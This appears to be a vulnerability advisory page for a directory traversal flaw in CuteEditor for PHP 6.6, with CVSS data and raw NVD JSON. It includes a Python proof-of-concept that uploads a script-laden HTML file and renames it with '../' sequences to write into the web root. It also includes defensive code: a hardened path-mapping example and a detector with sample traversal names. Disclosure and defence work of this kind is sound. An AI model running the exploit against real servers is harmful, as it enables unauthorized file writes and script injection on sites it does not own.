Security Vulnerability Report
CVE-2021-47751 CVSS 7.5 HIGH

CVE-2021-47751

Published: 2026-01-13 23:15:49
Last Modified: 2026-02-02 16:16:15

Description

CuteEditor for PHP (now marketed as Rich Text Editor) 6.6 contains a directory traversal vulnerability in the browse template feature that lets an attacker write files to arbitrary locations under the web root. The feature uploads an HTML file into the template directory and then lets the caller rename it; the new name is passed to the ServerMapPath() helper, which maps it onto the filesystem without checking that the result still lies inside the template directory. Supplying a name that contains directory traversal sequences (../) therefore moves the uploaded file outside the template directory, to any path the web server process can write.
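The following is an added example, not CuteEditor's code: a minimal model of the rename step described above. ServerMapPath()'s real implementation is not on this page, so `map_path_naive` is an assumed stand-in that reproduces the described behaviour (joining the caller-supplied name onto the template directory with no containment check), and `map_path_safe` shows the fix a practitioner would apply: resolve the path first, then require the result to remain under the template directory. The directory layout and the uploaded payload are constructed for the demo.

```python
import os
import tempfile


class PathTraversalError(ValueError):
    """Raised when a caller-supplied name would leave the template directory."""


def map_path_naive(template_dir: str, name: str) -> str:
    """Vulnerable (assumed model of ServerMapPath()): joins the name onto the
    directory, so a name containing '../' climbs out of it."""
    return os.path.normpath(os.path.join(template_dir, name))


def map_path_safe(template_dir: str, name: str) -> str:
    """Hardened: resolve symlinks and '..' first, then require the result to
    still sit inside template_dir. Rejects absolute paths and traversal."""
    base = os.path.realpath(template_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    # commonpath raises ValueError on mixed absolute/relative paths or different drives
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:
        inside = False
    if not inside or candidate == base:
        raise PathTraversalError(f"refusing to map {name!r} outside {base}")
    return candidate


def rename_template(template_dir: str, old: str, new: str, mapper) -> str:
    """Rename an uploaded template using the given path mapper; returns the
    final on-disk path so the caller can see where the file really landed."""
    src = mapper(template_dir, old)
    dst = mapper(template_dir, new)
    os.makedirs(os.path.dirname(dst), exist_ok=True)  # naive mapper may point at another dir
    os.replace(src, dst)
    return dst


def demo() -> dict:
    """Run both mappers against a traversal name inside a throwaway directory
    tree (constructed: <tmp>/var/www/html/cuteeditor/templates) and report
    where the file ended up for each variant."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        webroot = os.path.join(root, "var", "www", "html")
        template_dir = os.path.join(webroot, "cuteeditor", "templates")
        os.makedirs(template_dir)
        uploaded = os.path.join(template_dir, "malicious.html")
        with open(uploaded, "w") as f:
            f.write("<script>alert(1)</script>")  # constructed sample upload

        # Two levels up from the template directory is the web root.
        traversal_name = os.path.join("..", "..", "evil.html")

        landed = rename_template(template_dir, "malicious.html", traversal_name, map_path_naive)
        results["naive_escaped"] = not landed.startswith(template_dir + os.sep)
        results["naive_in_webroot"] = landed == os.path.join(webroot, "evil.html")

        # Put the file back and repeat with the hardened mapper.
        os.replace(landed, uploaded)
        try:
            rename_template(template_dir, "malicious.html", traversal_name, map_path_safe)
            results["safe_rejected"] = False
        except PathTraversalError:
            results["safe_rejected"] = True
        results["file_still_in_templates"] = os.path.exists(uploaded)
    return results


if __name__ == "__main__":
    print(demo())
```

The containment check must run on the fully resolved path (`realpath`), not on the raw string: stripping `../` textually can be bypassed with encodings or symlinks, while a resolved path either is or is not under the base directory.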

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Weakness
CWE-22 (Improper Limitation of a Pathname to a Restricted Directory, 'Path Traversal')

Note: the record also carries a CVSS 4.0 vector (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N, base score 5.3 MEDIUM) that rates privileges required as LOW, whereas the 3.1 vector above assumes none. Whether the browse template feature is reachable without authentication in a given deployment decides which rating applies.

Configurations (Affected Products)

cpe:2.3:a:phphtmledit:rich_text_editor:*:*:*:*:*:*:*:* - VULNERABLE (versionEndIncluding: 6.6)
CuteEditor for PHP 6.6
Rich Text Editor 6.6 and earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
from urllib.parse import urljoin

# CVE-2021-47751 PoC - CuteEditor for PHP Directory Traversal
# Target: CuteEditor for PHP <= 6.6
# Vulnerability: Path Traversal in browse template feature via ServerMapPath()

TARGET_URL = "http://target.com/cuteeditor/"
# New file name carrying the traversal sequence; the number of ../ depends on
# where the editor is installed relative to the web root
TARGET_PATH = "../../../../var/www/html/evil.html"
EVIL_CONTENT = "<script>alert('XSS via Directory Traversal')</script>"


def exploit_directory_traversal():
    """Exploit the directory traversal vulnerability in CuteEditor"""
    try:
        session = requests.Session()

        # Step 1/2: upload an HTML file through the browse template feature
        upload_url = f"{TARGET_URL}BrowseTemplate.aspx?action=upload"
        files = {
            'file': ('malicious.html', EVIL_CONTENT, 'text/html')
        }
        session.post(upload_url, files=files)

        # Step 3: rename it, supplying the traversal sequence as the new name
        rename_url = f"{TARGET_URL}BrowseTemplate.aspx?action=rename"
        rename_data = {
            'oldname': 'malicious.html',
            'newname': TARGET_PATH
        }
        session.post(rename_url, data=rename_data)

        # Step 4: verify the file was written to the web root, outside the template directory
        verify_url = urljoin(TARGET_URL, "/evil.html")  # http://target.com/evil.html
        verify_response = session.get(verify_url)
        if 'malicious' in verify_response.text or 'XSS' in verify_response.text:
            print("[+] Exploit successful! File written to web root.")
            return True
        print("[-] Exploit failed or file not found at target location.")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    print("CVE-2021-47751 - CuteEditor Directory Traversal Exploit")
    exploit_directory_traversal()
```
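As an added example (not part of the PoC above and not CuteEditor's code), the check below flags the rename step the PoC relies on before it reaches the filesystem. It decodes the supplied name repeatedly so percent-encoded and double-encoded traversal sequences are caught, treats both slash styles as separators, and rejects absolute paths and embedded NUL bytes. The parameter names (`oldname`, `newname`) and the sample requests are constructed assumptions taken from the PoC, not from the vendor's code.

```python
import re
from urllib.parse import unquote


def decode_repeatedly(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so that
    %2e%2e%2f and double-encoded %252e%252e%252f both reduce to ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_unsafe_filename(name: str) -> bool:
    """True if the decoded name could escape the template directory:
    a '..' path component (either separator), an absolute path, a Windows
    drive prefix, or an embedded NUL (used to truncate appended extensions)."""
    value = decode_repeatedly(name).replace("\\", "/")
    if "\x00" in value or value.startswith("/") or re.match(r"^[A-Za-z]:", value):
        return True
    return any(part == ".." for part in value.split("/"))


# Constructed sample rename requests as (id, oldname, newname); ids 2-6 are attacks,
# 1 and 7 are legitimate (dots inside a file name are not traversal).
SAMPLE_RENAMES = [
    (1, "draft.html", "newsletter.html"),
    (2, "malicious.html", "../../../../var/www/html/evil.html"),
    (3, "malicious.html", "..%2F..%2Fevil.html"),
    (4, "malicious.html", "%252e%252e%252fevil.html"),
    (5, "malicious.html", "..\\..\\evil.html"),
    (6, "malicious.html", "/var/www/html/evil.html"),
    (7, "a.html", "sub.dir/..hidden.html"),
]


def flag_traversal_renames(events):
    """Return the ids of rename requests whose old or new name is unsafe."""
    return [rid for rid, old, new in events
            if is_unsafe_filename(old) or is_unsafe_filename(new)]


if __name__ == "__main__":
    print("flagged:", flag_traversal_renames(SAMPLE_RENAMES))  # flagged: [2, 3, 4, 5, 6]
```

A check like this belongs in the application (or a WAF rule in front of it) as defence in depth; it does not replace resolving the final path and verifying containment, since a name that passes this filter can still be mapped unsafely by a broken ServerMapPath().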

References

http://phphtmledit.com/ (Product)
https://www.exploit-db.com/exploits/50994 (Exploit)
https://www.vulncheck.com/advisories/cuteeditor-for-php-directory-traversal (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47751", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:49.273", "lastModified": "2026-02-02T16:16:14.523", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "CuteEditor for PHP (now referred to as Rich Text Editor) 6.6 contains a directory traversal vulnerability in the browse template feature that allows attackers to write files to arbitrary web root directories. Attackers can exploit the ServerMapPath() function by renaming uploaded HTML files using directory traversal sequences to write files outside the intended template directory."}, {"lang": "es", "value": "CuteEditor para PHP (ahora conocido como Rich Text Editor) 6.6 contiene una vulnerabilidad de salto de directorio en la función de exploración de plantillas que permite a los atacantes escribir archivos en directorios raíz web arbitrarios. Los atacantes pueden explotar la función ServerMapPath() renombrando archivos HTML subidos utilizando secuencias de salto de directorio para escribir archivos fuera del directorio de plantillas previsto."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", 
"modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phphtmledit:rich_text_editor:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.6", "matchCriteriaId": "37543658-FFA1-4D4A-AF4C-8B8FE13D20BF"}]}]}], 
"references": [{"url": "http://phphtmledit.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50994", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/cuteeditor-for-php-directory-traversal", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50994", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}